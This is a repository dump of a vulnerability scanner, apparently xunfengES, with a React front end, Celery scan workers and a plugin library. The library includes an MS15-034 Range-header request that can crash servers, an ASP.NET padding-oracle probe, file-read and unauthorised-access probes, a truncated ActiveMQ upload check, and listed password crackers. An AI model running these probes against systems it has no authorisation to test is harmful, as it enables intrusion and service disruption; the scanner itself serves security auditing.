├── .gitignore
├── LICENSE
├── README.md
├── app
├── App.js
├── components
│ ├── AssetsTask.js
│ ├── UploadPlugins.js
│ ├── VulTask.js
│ ├── scantask
│ │ ├── CreateTask.js
│ │ ├── PeriodTask.js
│ │ └── TaskTips.js
│ └── vultask
│ │ ├── CreateTask.js
│ │ ├── SearchAssets.js
│ │ ├── ShowResult.js
│ │ └── TaskTips.js
└── index.js
├── celerynode
├── Config.py
├── __init__.py
├── api.py
├── cidr.py
├── common.py
├── redispool.py
├── subscribe.py
├── tasks.py
└── vuldb
│ ├── Confluence_CVE20158399.json
│ ├── Docker_Remote_API_20161220120458.json
│ ├── ElasticSearch_unauth.json
│ ├── MS10-070.py
│ ├── MS15-034.py
│ ├── MS17_010.py
│ ├── activemq_upload.py
│ ├── axis_config_read.py
│ ├── axis_info.json
│ ├── crack_axis.py
│ ├── crack_cisco_web.py
│ ├── crack_ftp.py
│ ├── crack_glassfish.py
│ ├── crack_grafana.py
│ ├── crack_jboss.py
│ ├── crack_jboss_new.py
│ ├── crack_mongo.py
│ ├── crack_mssql.py
│ ├── crack_mysql.py
│ ├── crack_postgres.py
│ ├── crack_redis.py
│ ├── crack_resin.py
│ ├── crack_ruijie_ac_web.py
│ ├── crack_smb.py
│ ├── crack_ssh.py
│ ├── crack_weblogic.py
│ ├── fastcgi_rce.py
│ ├── git_index_disclosure.json
│ ├── glassfish_filread.json
│ ├── heartbleed_poc.py
│ ├── hikvision_crackpass.py
│ ├── iis_shortfile.py
│ ├── iis_webdav.py
│ ├── iis_webdav_rce.py
│ ├── java_rmi_rce.py
│ ├── jboss_head.py
│ ├── jboss_info.json
│ ├── jboss_rce_un.py
│ ├── jenkins_CVE_2015_8103.py
│ ├── jenkins_CVE_2017_1000353.py
│ ├── jenkins_unauth.json
│ ├── jetty_refer.py
│ ├── memcache_unauth.py
│ ├── netgear_passwd.json
│ ├── nmb
│ ├── NetBIOS.py
│ ├── NetBIOSProtocol.py
│ ├── __init__.py
│ ├── base.py
│ ├── nmb_constants.py
│ ├── nmb_structs.py
│ └── utils.py
│ ├── phpmyadmin_crackpass.py
│ ├── pyasn1
│ ├── __init__.py
│ ├── codec
│ │ ├── __init__.py
│ │ ├── ber
│ │ │ ├── __init__.py
│ │ │ ├── decoder.py
│ │ │ ├── encoder.py
│ │ │ └── eoo.py
│ │ ├── cer
│ │ │ ├── __init__.py
│ │ │ ├── decoder.py
│ │ │ └── encoder.py
│ │ └── der
│ │ │ ├── __init__.py
│ │ │ ├── decoder.py
│ │ │ └── encoder.py
│ ├── compat
│ │ ├── __init__.py
│ │ ├── binary.py
│ │ └── octets.py
│ ├── debug.py
│ ├── error.py
│ └── type
│ │ ├── __init__.py
│ │ ├── base.py
│ │ ├── char.py
│ │ ├── constraint.py
│ │ ├── error.py
│ │ ├── namedtype.py
│ │ ├── namedval.py
│ │ ├── tag.py
│ │ ├── tagmap.py
│ │ ├── univ.py
│ │ └── useful.py
│ ├── resin_fileread.json
│ ├── resin_fileread_1.json
│ ├── resin_fileread_3.json
│ ├── rsync_weak_auth.py
│ ├── shiro_550.py
│ ├── smb
│ ├── SMBConnection.py
│ ├── SMBHandler.py
│ ├── SMBProtocol.py
│ ├── __init__.py
│ ├── base.py
│ ├── ntlm.py
│ ├── securityblob.py
│ ├── smb2_constants.py
│ ├── smb2_structs.py
│ ├── smb_constants.py
│ ├── smb_structs.py
│ └── utils
│ │ ├── U32.py
│ │ ├── __init__.py
│ │ ├── md4.py
│ │ ├── pyDes.py
│ │ └── sha256.py
│ ├── st2_eval.py
│ ├── svn_entries_disclosure.json
│ ├── tomcat_crackpass.py
│ ├── web_fileread.py
│ ├── web_shellshock.py
│ ├── weblogic_CVE_2015_4852.py
│ ├── websphere_CVE_2015_7450.py
│ ├── wordpress_crackpass.py
│ ├── zabbix_jsrpc_SQL.json
│ ├── zabbix_latest_sql.py
│ └── zookeeper_unauth_access.py
├── package.json
├── server
├── Config.py
├── Index.py
├── Routes.py
├── __init__.py
├── common.py
├── es.py
├── esinit.py
├── lib
│ ├── Login.py
│ └── __init__.py
├── monitor
│ ├── index.py
│ └── verify.py
├── redispool.py
├── run.py
├── static
│ ├── css
│ │ ├── bootstrap.min.css
│ │ └── index.css
│ ├── fonts
│ │ ├── glyphicons-halflings-regular.eot
│ │ ├── glyphicons-halflings-regular.svg
│ │ ├── glyphicons-halflings-regular.ttf
│ │ └── glyphicons-halflings-regular.woff
│ ├── images
│ │ └── wind.jpeg
│ └── js
│ │ ├── bundle-login.js
│ │ ├── common.js
│ │ └── index.js
├── templates
│ ├── error.html
│ ├── index.html
│ └── login.html
└── vulscan
│ ├── __init__.py
│ ├── vulScan.py
│ └── vuldb
│ ├── Confluence_CVE20158399.json
│ ├── Docker_Remote_API_20161220120458.json
│ ├── ElasticSearch_unauth.json
│ ├── MS10-070.py
│ ├── MS15-034.py
│ ├── MS17_010.py
│ ├── __init__.py
│ ├── activemq_upload.py
│ ├── axis_config_read.py
│ ├── axis_info.json
│ ├── crack_axis.py
│ ├── crack_cisco_web.py
│ ├── crack_ftp.py
│ ├── crack_glassfish.py
│ ├── crack_grafana.py
│ ├── crack_jboss.py
│ ├── crack_jboss_new.py
│ ├── crack_mongo.py
│ ├── crack_mssql.py
│ ├── crack_mysql.py
│ ├── crack_postgres.py
│ ├── crack_redis.py
│ ├── crack_resin.py
│ ├── crack_ruijie_ac_web.py
│ ├── crack_smb.py
│ ├── crack_ssh.py
│ ├── crack_weblogic.py
│ ├── fastcgi_rce.py
│ ├── git_index_disclosure.json
│ ├── glassfish_filread.json
│ ├── heartbleed_poc.py
│ ├── hikvision_crackpass.py
│ ├── iis_shortfile.py
│ ├── iis_webdav.py
│ ├── iis_webdav_rce.py
│ ├── java_rmi_rce.py
│ ├── jboss_head.py
│ ├── jboss_info.json
│ ├── jboss_rce_un.py
│ ├── jenkins_CVE_2015_8103.py
│ ├── jenkins_CVE_2017_1000353.py
│ ├── jenkins_unauth.json
│ ├── jetty_refer.py
│ ├── memcache_unauth.py
│ ├── netgear_passwd.json
│ ├── nmb
│ ├── NetBIOS.py
│ ├── NetBIOSProtocol.py
│ ├── __init__.py
│ ├── base.py
│ ├── nmb_constants.py
│ ├── nmb_structs.py
│ └── utils.py
│ ├── phpmyadmin_crackpass.py
│ ├── pyasn1
│ ├── __init__.py
│ ├── codec
│ │ ├── __init__.py
│ │ ├── ber
│ │ │ ├── __init__.py
│ │ │ ├── decoder.py
│ │ │ ├── encoder.py
│ │ │ └── eoo.py
│ │ ├── cer
│ │ │ ├── __init__.py
│ │ │ ├── decoder.py
│ │ │ └── encoder.py
│ │ └── der
│ │ │ ├── __init__.py
│ │ │ ├── decoder.py
│ │ │ └── encoder.py
│ ├── compat
│ │ ├── __init__.py
│ │ ├── binary.py
│ │ └── octets.py
│ ├── debug.py
│ ├── error.py
│ └── type
│ │ ├── __init__.py
│ │ ├── base.py
│ │ ├── char.py
│ │ ├── constraint.py
│ │ ├── error.py
│ │ ├── namedtype.py
│ │ ├── namedval.py
│ │ ├── tag.py
│ │ ├── tagmap.py
│ │ ├── univ.py
│ │ └── useful.py
│ ├── resin_fileread.json
│ ├── resin_fileread_1.json
│ ├── resin_fileread_3.json
│ ├── rsync_weak_auth.py
│ ├── shiro_550.py
│ ├── smb
│ ├── SMBConnection.py
│ ├── SMBHandler.py
│ ├── SMBProtocol.py
│ ├── __init__.py
│ ├── base.py
│ ├── ntlm.py
│ ├── securityblob.py
│ ├── smb2_constants.py
│ ├── smb2_structs.py
│ ├── smb_constants.py
│ ├── smb_structs.py
│ └── utils
│ │ ├── U32.py
│ │ ├── __init__.py
│ │ ├── md4.py
│ │ ├── pyDes.py
│ │ └── sha256.py
│ ├── st2_eval.py
│ ├── svn_entries_disclosure.json
│ ├── tomcat_crackpass.py
│ ├── web_fileread.py
│ ├── web_shellshock.py
│ ├── weblogic_CVE_2015_4852.py
│ ├── websphere_CVE_2015_7450.py
│ ├── wordpress_crackpass.py
│ ├── zabbix_jsrpc_SQL.json
│ ├── zabbix_latest_sql.py
│ └── zookeeper_unauth_access.py
└── webpack.config.js
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | env/
12 | build/
13 | develop-eggs/
14 | dist/
15 | downloads/
16 | eggs/
17 | .eggs/
18 |
19 | lib64/
20 | parts/
21 | sdist/
22 | var/
23 | wheels/
24 | *.egg-info/
25 | .installed.cfg
26 | *.egg
27 |
28 | # PyInstaller
29 | # Usually these files are written by a python script from a template
30 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
31 | *.manifest
32 | *.spec
33 |
34 | # Installer logs
35 | pip-log.txt
36 | pip-delete-this-directory.txt
37 |
38 | # Unit test / coverage reports
39 | htmlcov/
40 | .tox/
41 | .coverage
42 | .coverage.*
43 | .cache
44 | nosetests.xml
45 | coverage.xml
46 | *.cover
47 | .hypothesis/
48 |
49 | # Translations
50 | *.mo
51 | *.pot
52 |
53 | # Django stuff:
54 | *.log
55 | local_settings.py
56 |
57 | # Flask stuff:
58 | instance/
59 | .webassets-cache
60 |
61 | # Scrapy stuff:
62 | .scrapy
63 |
64 | # Sphinx documentation
65 | docs/_build/
66 |
67 | # PyBuilder
68 | target/
69 |
70 | # Jupyter Notebook
71 | .ipynb_checkpoints
72 |
73 | # pyenv
74 | .python-version
75 |
76 | # celery beat schedule file
77 | celerybeat-schedule
78 |
79 | # SageMath parsed files
80 | *.sage.py
81 |
82 | # dotenv
83 | .env
84 |
85 | # virtualenv
86 | .venv
87 | venv/
88 | ENV/
89 |
90 | # Spyder project settings
91 | .spyderproject
92 | .spyproject
93 |
94 | # Rope project settings
95 | .ropeproject
96 |
97 | # mkdocs documentation
98 | /site
99 |
100 | # mypy
101 | .mypy_cache/
102 | node_modules/
103 | test/
104 |
--------------------------------------------------------------------------------
/app/App.js:
--------------------------------------------------------------------------------
1 | import React from 'react';
2 | import { Layout, Menu, Icon, notification } from 'antd';
3 | const { Content, Header, Footer } = Layout;
4 | import { Link } from 'react-router';
5 | import axios from 'axios';
6 |
7 | import UploadPlugins from './components/UploadPlugins';
8 |
9 | class App extends React.Component{
10 |
11 | handleClick = (e) => {
12 | if(e.key == 5){
13 | axios.post('/loginOut')
14 | .then(function(res){
15 | notification.open({
16 | message: '注销成功',
17 | icon:
18 | });
19 | })
20 | .catch(function(err){
21 | notification.open({
22 | message: '注销失败',
23 | icon:
24 | });
25 | });
26 | }
27 | }
28 |
29 | render() {
30 | return (
31 |
32 |
33 |
59 |
60 |
61 | {this.props.children}
62 |
63 |
66 |
67 | );
68 | }
69 | }
70 |
71 | export default App;
--------------------------------------------------------------------------------
/app/components/AssetsTask.js:
--------------------------------------------------------------------------------
1 | import React from 'react';
2 | import { Row, Col, Card } from 'antd';
3 |
4 | import CreateTask from './scantask/CreateTask';
5 | import PeriodTask from './scantask/PeriodTask';
6 | import TaskTips from './scantask/TaskTips';
7 |
8 | class AssetsTask extends React.Component{
9 | render(){
10 | return(
11 |
12 |
13 | } style={{ height:"473px" }}>
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 | )
24 | }
25 | }
26 |
27 | export default AssetsTask;
--------------------------------------------------------------------------------
/app/components/UploadPlugins.js:
--------------------------------------------------------------------------------
1 | import React from 'react';
2 | import { Upload, notification, Button, Icon } from 'antd';
3 |
4 | class UploadPlugins extends React.Component{
5 | render(){
6 | const props = {
7 | name: 'file',
8 | action: '/uploadPlugins',
9 | showUploadList: false,
10 | onChange(info) {
11 | if (info.file.status === 'done') {
12 | notification.open({
13 | message: `${info.file.name} 插件上传成功`,
14 | icon:
15 | });
16 | } else if (info.file.status === 'error') {
17 | notification.open({
18 | message: `${info.file.name} 插件上传失败`,
19 | icon:
20 | });
21 | }
22 | }
23 | };
24 | return(
25 |
26 |
27 |
30 |
31 |
32 | )
33 | }
34 | }
35 |
36 | export default UploadPlugins;
--------------------------------------------------------------------------------
/app/components/VulTask.js:
--------------------------------------------------------------------------------
1 | import React from 'react';
2 | import { Row, Col, Card } from 'antd';
3 |
4 | import SearchAssets from './vultask/SearchAssets';
5 | import TaskTips from './vultask/TaskTips';
6 |
7 | class VulTask extends React.Component{
8 | render(){
9 | return(
10 |
11 |
12 | } >
13 |
14 |
15 |
16 |
17 | )
18 | }
19 | }
20 |
21 | export default VulTask;
--------------------------------------------------------------------------------
/app/components/scantask/CreateTask.js:
--------------------------------------------------------------------------------
1 | import React from 'react';
2 | import { Form, Input, Tag, Button, notification, Icon } from 'antd';
3 | const FormItem = Form.Item;
4 | import axios from 'axios';
5 |
6 | class CreateTask extends React.Component{
7 |
8 | setHostScan = (scanIP) => {
9 | axios.post('/setHostScan',{
10 | scan_hosts: scanIP
11 | })
12 | .then(function(res){
13 | notification.open({
14 | message: '任务创建成功',
15 | icon:
16 | });
17 | })
18 | .catch(function(err){
19 | notification.open({
20 | message: '任务创建失败',
21 | icon:
22 | });
23 | });
24 | }
25 |
26 | handleSubmit = (e) => {
27 | e.preventDefault();
28 | this.props.form.validateFields((err, values) => {
29 | this.setHostScan(values.scanAssets);
30 | });
31 | }
32 |
33 | render(){
34 | const { getFieldDecorator } = this.props.form;
35 | const formItemLayout = {
36 | labelCol: { span: 0 },
37 | wrapperCol: { span: 24 },
38 | };
39 | return(
40 |
55 | )
56 | }
57 | }
58 |
59 | CreateTask = Form.create({})(CreateTask);
60 | export default CreateTask;
--------------------------------------------------------------------------------
/app/components/scantask/TaskTips.js:
--------------------------------------------------------------------------------
1 | import React from 'react';
2 | import { Popover, Button } from 'antd';
3 |
4 | class TaskTips extends React.Component{
5 | render(){
6 |
7 | let content = (
8 |
9 | 资产发现
10 | 单次扫描
11 | 192.168.1.1-192.168.1.255
12 | 使用master队列扫描(默认)
13 | 192.168.1.1-192.168.1.255|celery
14 | 使用celery队列扫描
15 |
16 | 配置项:
17 | 周期验证配置:周期扫描IP
18 | 验证周期:天|小时,如5|16,即每5天16点进行扫描。
19 |
20 | );
21 |
22 | return(
23 |
24 |
25 |
26 | )
27 | }
28 | }
29 |
30 | export default TaskTips;
--------------------------------------------------------------------------------
/app/components/vultask/ShowResult.js:
--------------------------------------------------------------------------------
1 | import React from 'react';
2 | import { Modal, Button, Table } from 'antd';
3 |
4 | const columns = [{
5 | title: 'Host',
6 | dataIndex: 'host',
7 | width: 150,
8 | }, {
9 | title: 'Port',
10 | dataIndex: 'port',
11 | width: 150,
12 | }, {
13 | title: 'Server',
14 | dataIndex: 'server',
15 | }];
16 |
17 | class ShowResult extends React.Component{
18 | constructor(props){
19 | super(props);
20 |
21 | this.state = {
22 | visible: false
23 | }
24 | }
25 |
26 | showModal = () => {
27 | this.setState({ visible: true });
28 | }
29 |
30 | handleCancel = () => {
31 | this.setState({ visible: false });
32 | }
33 |
34 | render() {
35 | const { visible } = this.state;
36 | const { searchResult } = this.props;
37 | const data = [];
38 | searchResult.map( (v, index) => {
39 | data.push({
40 | key: index,
41 | host: v.host,
42 | port: v.port,
43 | server: v.server
44 | });
45 | });
46 |
47 | return (
48 |
49 |
52 |
59 |
65 |
66 |
8 | 搜索规则
9 | 主机,host:192.168.1.1
10 | 端口,port:80
11 | 代码语言,codes:php
12 | 服务,server:apache
13 | CMS,cms:discuz!
14 | 组合查询使用 ";"
15 | eg:
16 | host:192.168.1.1;port:80
17 |
18 | );
19 |
20 | return(
21 |
22 |
23 |
24 | )
25 | }
26 | }
27 |
28 | export default TaskTips;
--------------------------------------------------------------------------------
/app/index.js:
--------------------------------------------------------------------------------
1 | import React from 'react';
2 | import ReactDOM from 'react-dom';
3 | import { Router, Route, hashHistory, IndexRoute } from 'react-router';
4 |
5 | import App from './App';
6 |
7 | import AssetsTask from './components/AssetsTask';
8 | import VulTask from './components/VulTask';
9 |
10 | const routes =
11 |
12 |
13 |
14 | ;
15 |
16 | ReactDOM.render(
17 |
18 | {routes}
19 | ,
20 | document.getElementById('root')
21 | );
--------------------------------------------------------------------------------
/celerynode/Config.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | # Redis配置
3 | class RedisConfig(object):
4 | HOST = "localhost"
5 | PORT = 6379
6 | PASSWORD = ""
7 | BR = 1
8 | HOSTSCANKEY = "hostScan"
9 | VULTASKKEY = "vulTask"
10 |
11 | # Celery配置
12 | class CeleryConfig(RedisConfig):
13 | BROKER_URL = "redis://:{0}@{1}:{2}/{3}".format(RedisConfig.PASSWORD, RedisConfig.HOST, RedisConfig.PORT, RedisConfig.BR)
14 | CELERY_TASK_SERIALIZER = "json"
15 | CELERY_TIMEZONE = "Asia/Shanghai"
16 |
--------------------------------------------------------------------------------
/celerynode/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/celerynode/__init__.py
--------------------------------------------------------------------------------
/celerynode/api.py:
--------------------------------------------------------------------------------
1 | import urllib2
2 |
3 | from tasks import hostScan, hostVerify, vulPocCheck, vulScriptCheck
4 | from common import get_ip_list
5 |
6 | def api_hostScan(hostsList, ports, arguments='-Pn -sV', queue="master"):
7 | """
8 | hosts: 192.168.1.1-192.168.1.128,192.168.1.129-192.168.1.130
9 | arguments: -Pn -sV
10 | """
11 | hostsList = hostsList.split(",")
12 | for hostsQ in hostsList:
13 | if hostsQ.find("|") != -1:
14 | hosts, queue = hostsQ.split("|")
15 | else:
16 | hosts, queue = (hostsQ, "master")
17 | ipList = get_ip_list(hosts)
18 | for v in ipList:
19 | hostScan.apply_async(args=[v, ports, arguments, queue], queue=queue)
20 | return True
21 |
22 | def api_hostVerify(host, port, queue="master"):
23 | """
24 | host: 192.168.1.1
25 | port: 80
26 | """
27 | hostVerify.apply_async(args=[host, port, queue], queue=queue)
28 | return True
29 |
30 | def api_vulPoc(task_id, task_name, netloc, pluginInfo):
31 | # .json payload
32 | # for v in netlocList
33 | for item_netloc in netloc:
34 | vulPocCheck.apply_async(args=[task_id, task_name, item_netloc, pluginInfo, item_netloc["queue"]], queue=item_netloc["queue"])
35 |
36 | def api_vulScript(task_id, task_name, netloc, pfileName, passDic):
37 | #.py scripts
38 | # for v in netlocList
39 | for item_netloc in netloc:
40 | vulScriptCheck.apply_async(args=[task_id, task_name, item_netloc, pfileName, passDic, item_netloc["queue"]], queue=item_netloc["queue"])
--------------------------------------------------------------------------------
/celerynode/cidr.py:
--------------------------------------------------------------------------------
1 | def stringxor(str1, str2):
2 | orxstr = ""
3 | for i in range(0, len(str1)):
4 | rst = int(str1[i]) & int(str2[i])
5 | orxstr = orxstr + str(rst)
6 | return orxstr
7 |
8 | def bin2dec(string_num):
9 | return str(int(string_num, 2))
10 |
11 | def getip(ip, type):
12 | result = ''
13 | for i in range(4):
14 | item = bin2dec(ip[0:8])
15 | if i == 3:
16 | if type == 0:
17 | item = str(int(item) + 1)
18 | else:
19 | item = str(int(item) - 1)
20 | result = result + item + '.'
21 | ip = ip[8:]
22 | return result.strip('.')
23 |
24 | def CIDR(input):
25 | try:
26 | ip = input.split('/')[0]
27 | pos = int(input.split('/')[1])
28 | ipstr = ''
29 | for i in ip.split('.'):
30 | ipstr = ipstr + bin(int(i)).replace('0b', '').zfill(8)
31 | pstr = '1' * pos + '0' * (32 - pos)
32 | res = stringxor(ipstr, pstr)
33 | _ip = getip(res, 0), getip(res[0:pos] + '1' * (32 - pos), 1)
34 | return _ip[0] + "-" + _ip[1]
35 | except:
36 | return None
37 |
--------------------------------------------------------------------------------
/celerynode/common.py:
--------------------------------------------------------------------------------
1 | import hashlib
2 | import re
3 | import urllib2
4 |
5 | def get_ip_list(ip):
6 | #hosts = "10.151.136.0/24" CIDR
7 | #hosts = "10.151.136.0-10.151.136.10"
8 | ip_list_tmp = []
9 | iptonum = lambda x: sum([256 ** j * int(i) for j, i in enumerate(x.split('.')[::-1])])
10 | numtoip = lambda x: '.'.join([str(x / (256 ** i) % 256) for i in range(3, -1, -1)])
11 | if '-' in ip:
12 | ip_range = ip.split('-')
13 | ip_start = long(iptonum(ip_range[0]))
14 | ip_end = long(iptonum(ip_range[1]))
15 | ip_count = ip_end - ip_start
16 | if ip_count >= 0 and ip_count <= 655360:
17 | for ip_num in range(ip_start, ip_end + 1):
18 | ip_list_tmp.append(numtoip(ip_num))
19 | else:
20 | print '-h wrong format'
21 | else:
22 | ip_split = ip.split('.')
23 | net = len(ip_split)
24 | if net == 2:
25 | for b in range(1, 255):
26 | for c in range(1, 255):
27 | ip = "%s.%s.%d.%d" % (ip_split[0], ip_split[1], b, c)
28 | ip_list_tmp.append(ip)
29 | elif net == 3:
30 | for c in range(1, 255):
31 | ip = "%s.%s.%s.%d" % (ip_split[0], ip_split[1], ip_split[2], c)
32 | ip_list_tmp.append(ip)
33 | elif net == 4:
34 | ip_list_tmp.append(ip)
35 | else:
36 | print "-h wrong format"
37 | return ip_list_tmp
38 |
39 | def get_id_md5(host, port):
40 | h = hashlib.md5()
41 | h.update("{0}:{1}".format(host, port))
42 | return h.hexdigest()
43 |
44 | def get_code(header, html):
45 | try:
46 | m = re.search(r'| |/)', html, flags=re.I)
47 | if m: return m.group(1).replace('"', '')
48 | except:
49 | pass
50 | try:
51 | if 'Content-Type' in header:
52 | Content_Type = header['Content-Type']
53 | m = re.search(r'.*?charset=(.*?)(;|$)', Content_Type, flags=re.I)
54 | if m: return m.group(1)
55 | except:
56 | pass
57 |
58 | #@param
59 | # task_netloc list: [host, port]
60 | # pluginInfo list: {"url":"", "method":"", "data":""}
61 |
62 | def set_request(task_netloc, pluginInfo):
63 | url = 'http://' + task_netloc[0] + ":" + str(task_netloc[1]) + pluginInfo['url']
64 | if pluginInfo['method'] == 'GET':
65 | request = urllib2.Request(url)
66 | else:
67 | request = urllib2.Request(url, pluginInfo['data'])
68 | return request
--------------------------------------------------------------------------------
/celerynode/redispool.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import os
3 | import redis
4 | from Config import RedisConfig
5 |
6 | def getPoolBR():
7 | try:
8 | poolBR = redis.ConnectionPool(host=RedisConfig.HOST, port=RedisConfig.PORT, password=RedisConfig.PASSWORD, db=RedisConfig.BR)
9 | return redis.Redis(connection_pool=poolBR)
10 | except Exception as e:
11 | print 'redis connect error'
12 | return 'None'
13 |
14 | def getStrictRedis():
15 | try:
16 | r = redis.StrictRedis(host=RedisConfig.HOST, port=RedisConfig.PORT, password=RedisConfig.PASSWORD, db=RedisConfig.BR)
17 | return r
18 | except Exception as e:
19 | print 'redis connect error'
20 | return 'None'
--------------------------------------------------------------------------------
/celerynode/subscribe.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import time
3 | import json
4 | import os
5 | import sys
6 | from redispool import getStrictRedis
7 | reload(sys)
8 | sys.setdefaultencoding('utf-8')
9 |
10 | FILE_PATH = os.path.split(os.path.realpath(__file__))[0] + '/vuldb/'
11 |
12 | if __name__ == '__main__':
13 | r = getStrictRedis()
14 | p = r.pubsub()
15 | p.subscribe("updateplugins")
16 | while True:
17 | try:
18 | message = p.get_message()
19 | if message:
20 | m = json.loads(message["data"])
21 | filename = m["filename"]
22 | content = m["content"]
23 | f = open(FILE_PATH + filename, "w")
24 | f.write(content)
25 | f.close()
26 | time.sleep(10)
27 | except Exception as e:
28 | pass
29 |
--------------------------------------------------------------------------------
/celerynode/vuldb/Confluence_CVE20158399.json:
--------------------------------------------------------------------------------
1 | {"info": "CVE-2015-8399\uff0cAtlassian Confluence 5.8.17\u4e4b\u524d\u7248\u672c\u4e2d\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u5217\u4e3e\u8bfb\u53d6\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u5217\u4e3e\u8bfb\u53d6\u670d\u52a1\u5668\u4e0a\u7684\u6587\u4ef6\u3002", "source": 0, "name": "Confluence\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6", "keyword": "banner:Atlassian Confluence", "level": "\u9ad8\u5371", "url": "https://www.exploit-db.com/exploits/39170/", "author": "wolf@YSRC", "type": "\u6587\u4ef6\u8bfb\u53d6", "plugin": {"url": "/spaces/viewdefaultdecorator.action?decoratorName=/", "tag": "\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e", "analyzing": "keyword", "analyzingdata": "log4j.properties", "data": "", "method": "GET"}}
--------------------------------------------------------------------------------
/celerynode/vuldb/Docker_Remote_API_20161220120458.json:
--------------------------------------------------------------------------------
1 | {
2 | "info": "Docker Remote API未授权访问可导致代码泄露,严重可导致服务器被入侵控制。",
3 | "source": 1,
4 | "name": "Docker Remote API未授权访问",
5 | "keyword": "port:2375",
6 | "level": "高危",
7 | "url": "http://www.tuicool.com/articles/3Yv2iiY",
8 | "author": "wolf@YSRC",
9 | "type": "未授权访问",
10 | "plugin": {
11 | "url": "/containers/json",
12 | "tag": "Remote API 未授权访问",
13 | "analyzing": "keyword",
14 | "analyzingdata": "HostConfig",
15 | "data": "",
16 | "method": "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/ElasticSearch_unauth.json:
--------------------------------------------------------------------------------
1 | {
2 | "name" : "ElasticSearch未授权访问",
3 | "info" : "未授权访问导致数据信息泄露,部分版本或插件存在漏洞,严重可导致服务器被入侵。",
4 | "level": "高危",
5 | "type" : "未授权访问",
6 | "author": "wolf@YSRC",
7 | "url": "",
8 | "keyword" : "server:elasticsearch",
9 | "source" : 1,
10 | "plugin" : {
11 | "url" : "/_cat",
12 | "tag" : "未授权访问",
13 | "analyzing" : "keyword",
14 | "analyzingdata" : "/_cat/master",
15 | "data" : "",
16 | "method" : "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/MS10-070.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import base64
3 | import urllib2
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": ".NET Padding Oracle信息泄露",
8 | "info": "攻击者通过此漏洞最终可以达到任意文件读取的效果。",
9 | "level": "高危",
10 | "type": "任意文件读取",
11 | "author": "wolf@YSRC",
12 | "url": "",
13 | "keyword": "tag:aspx",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 | def check(ip, port, timeout):
19 | try:
20 | url = 'http://' + ip + ":" + str(port)
21 | res_html = urllib2.urlopen(url, timeout=timeout).read()
22 | if 'WebResource.axd?d=' in res_html:
23 | error_i = 0
24 | bglen = 0
25 | for k in range(0, 255):
26 | IV = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + chr(k)
27 | bgstr = 'A' * 21 + '1'
28 | enstr = base64.b64encode(IV).replace('=', '').replace('/', '-').replace('+', '-')
29 | exp_url = "%s/WebResource.axd?d=%s" % (url, enstr + bgstr)
30 | try:
31 | request = urllib2.Request(exp_url)
32 | res = urllib2.urlopen(request, timeout=timeout)
33 | res_html = res.read()
34 | res_code = res.code
35 | except urllib2.HTTPError, e:
36 | res_html = e.read()
37 | res_code = e.code
38 | except urllib2.URLError, e:
39 | error_i += 1
40 | if error_i >= 3: return
41 | except:
42 | return
43 | if int(res_code) == 200 or int(res_code) == 500:
44 | if k == 0:
45 | bgcode = int(res_code)
46 | bglen = len(res_html)
47 | else:
48 | necode = int(res_code)
49 | if (bgcode != necode) or (bglen != len(res_html)):
50 | return u'MS10-070 ASP.NET Padding Oracle信息泄露漏洞'
51 | else:
52 | return
53 | except Exception, e:
54 | pass
55 |
--------------------------------------------------------------------------------
/celerynode/vuldb/MS15-034.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import socket
3 |
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "HTTP.sys 远程代码执行",
8 | "info": "MS15-034 HTTP.sys 远程代码执行(CVE-2015-1635),但目前仅能作为DOS攻击",
9 | "level": "中危",
10 | "type": "DOS",
11 | "author": "wolf@YSRC",
12 | "url": "https://www.secpulse.com/archives/6009.html",
13 | "keyword": "tag:iis",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip, port, timeout):
20 | try:
21 | socket.setdefaulttimeout(timeout)
22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | s.connect((ip, int(port)))
24 | flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
25 | s.send(flag)
26 | data = s.recv(1024)
27 | s.close()
28 | if 'Requested Range Not Satisfiable' in data:
29 | return u"存在HTTP.sys远程代码执行漏洞"
30 | except:
31 | pass
32 |
--------------------------------------------------------------------------------
/celerynode/vuldb/activemq_upload.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import socket
3 | import time
4 | import urllib2
5 | import random
6 |
7 | def get_plugin_info():
8 | plugin_info = {
9 | "name": "ActiveMQ unauthenticated RCE",
10 | "info": "CVE-2015-1830,攻击者通过此漏洞可直接上传webshell,进而入侵控制服务器。",
11 | "level": "紧急",
12 | "type": "任意文件上传",
13 | "author": "wolf@YSRC",
14 | "url": "http://cve.scap.org.cn/CVE-2015-1830.html",
15 | "keyword": "title:ActiveMQ",
16 | "source": 1
17 | }
18 | return plugin_info
19 |
20 | def random_str(len):
21 | str1 = ""
22 | for i in range(len):
23 | str1 += (random.choice("ABCDEFGH1234567890"))
24 | return str1
25 |
26 | def check(ip, port, timeout):
27 | try:
28 | socket.setdefaulttimeout(timeout)
29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30 | s.connect((ip, port))
31 | filename = random_str(6)
